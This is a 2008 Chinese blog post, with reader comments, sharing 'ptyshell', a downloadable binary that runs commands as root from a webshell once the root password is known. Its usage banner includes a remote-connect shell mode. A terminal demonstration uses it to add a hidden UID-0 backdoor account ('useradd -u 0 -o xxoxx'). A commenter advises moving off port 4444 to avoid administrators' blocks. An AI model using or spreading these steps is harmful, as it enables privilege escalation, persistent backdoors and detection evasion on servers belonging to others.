百度空间 | 百度首页 
 
查看文章
  
一个知道root密码可以在webshell里面执行命令的程序
2008年12月15日 星期一 下午 09:22

[test@localhost tmp]$ ls -l
total 488
-rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static
[test@localhost tmp]$ md5sum ptyshell-static
3ea2a909f736660097c0248d403bbe80 ptyshell-static
[test@localhost tmp]$ ./ptyshell-static
ptyshell v0.4
orignal written by wzt ,psexec feature added by xi4oyu
usage: ./ptyshell-static <port> | <remote ip> <port>
./ptyshell-static -u username -p password -c command -pd port

使用方法:
[test@localhost tmp]$ ./ptyshell-static 4444
[test@localhost tmp]$ grep xxoxx /etc/passwd
[test@localhost tmp]$ ./ptyshell-static -u root -p test -c "useradd -u 0 -o xxoxx" -dp 4444
Beginning to send command!
[test@localhost tmp]$ grep xxoxx /etc/passwd
xxoxx:x:0:510::/home/xxoxx:/bin/bash
[test@localhost tmp]$

执行第二个命令的时候需要等待几秒,以后的命令执行都不需要再执行./ptyshell-stat 4444了。直接执行第二个命令就行。注意命令用""包含起来,命令表太长了,哈哈,否则不能执行可别怪我。

这里webshell里面也可以执行的,一个道理,呵呵。纯属2B之作,大家随便玩玩。

感谢tr宝宝提供空间

http://www.pcsec.org/upload/2008/12/ptyshell-static.rar


类别:Tools | 浏览() | 评论 (6)
 
最近读者:
 
网友评论:
1
2008年12月15日 星期一 下午 09:47 | 回复
貌似wzt写的? 直接给个bin谁敢用啊?
 
3
2008年12月15日 星期一 下午 10:09 | 回复
src code不放是因为写的太2了,你要觉得有问题可以不用
 
4
2008年12月16日 星期二 上午 10:19 | 回复
为何要开一个4444端口?我不懂,瞎问的,见笑
 
5
2008年12月16日 星期二 下午 01:27 | 回复
懒的用其他方式通讯,就用了socket 的通信方式,呵呵,所以先要打开个端口。 很2B的方法,但能用就行撒
 
6
2009年01月07日 星期三 下午 08:38 | 回复
 
7
2009年11月04日 星期三 上午 08:25 | 回复
换个端口吧 4444太招摇,很多管理员都会封掉这个端口的。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu